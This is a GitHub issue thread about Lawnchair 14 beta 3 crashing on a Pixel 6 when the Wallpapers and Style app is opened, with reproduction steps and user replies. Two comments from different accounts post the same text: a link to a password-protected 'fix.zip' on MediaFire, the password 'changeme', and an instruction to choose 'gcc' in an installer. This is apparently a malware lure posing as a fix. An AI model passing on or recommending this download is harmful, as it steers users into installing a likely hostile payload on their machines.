### ISSUE TITLE
[BUG] Lawnchair 14 beta 3 crashes trying to open Wallpapers and Style app

### ISSUE THREAD

**Issue by alcoolfire** [Deletescape-Media/Lawnchair#4736]
### Describe the bug

Lawnchair 14 beta 3 is crashing on a Google Pixel 6 when trying to use the *Wallpapers and Style* app. This did **not** happen in the version already installed prior to the 14 beta 3 update.

Upon restarting the phone there is a prompt to select between Lawnchair and Pixel Launcher even though it was successfully configured to always use Lawnchair in the version running prior to the update to 14 beta 3.

I'm reporting this bug on behalf of someone else, but can ask for additional information if required.

See below for steps to reproduce, screenshot with crash alerts, and bug report generated by Lawnchair.

### Steps to reproduce

Steps to reproduce the behaviour:

1. Long click on home screen, then select *Wallpapers and Style*.

2. Click to open *Wallpapers and Style* app.

3. A notification of a crash pops up.

4. Selecting *Upload Crash Log* only results in a pop up appearing saying Lawnchair has stopped working.

5. Swiping the notification away instead results in nothing.

6. Repeating from step 1 does **not** result in the notification appearing again.

7. Restarting the phone and logging in results in a pop up asking you to choose between Lawnchair or the Pixel Launcher, even though the phone is set to **always** use Lawnchair.

8. Having restarted the phone, starting at step 1 again, the notification will pop up just as seen in step 3 onwards.

### Expected behavior

No crashing, of course. No prompting for which launcher to use. Able to successfully upload crash logs.

### Screenshots

![1000008497](https://github.com/user-attachments/assets/6a0359c2-ae88-4733-98fe-d1f6b812f108)

### Device information

- Device: Google Pixel 6
- OS: Android 14
- App version: 14 beta 3

### Additional context

[Lawnchair bug report Aug 24, 2024 7-27-43 pm.txt](https://github.com/user-attachments/files/16773520/Lawnchair.bug.report.Aug.24.2024.7-27-43.pm.txt)

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by alcoolfire** [comment]
Hmm, is this problem related to #4606? Didn't spot that report before I filed this one. Didn't seem to have this problem prior to 14 beta 3 though.

**Comment by oneofmanyacdcfanstoo** [comment]
This happened on my girlfriend's Pixel 7 Pro as well.

**Comment by EmpireMatrix** [comment]
I have had this bug for a while, even with prior versions of lawnchair. Seems to be a conflict between launcher3 and lawnchair somehow.

**Comment by MrSluffy** [comment]
can you try and check latest nightly if still persists reopen this issue
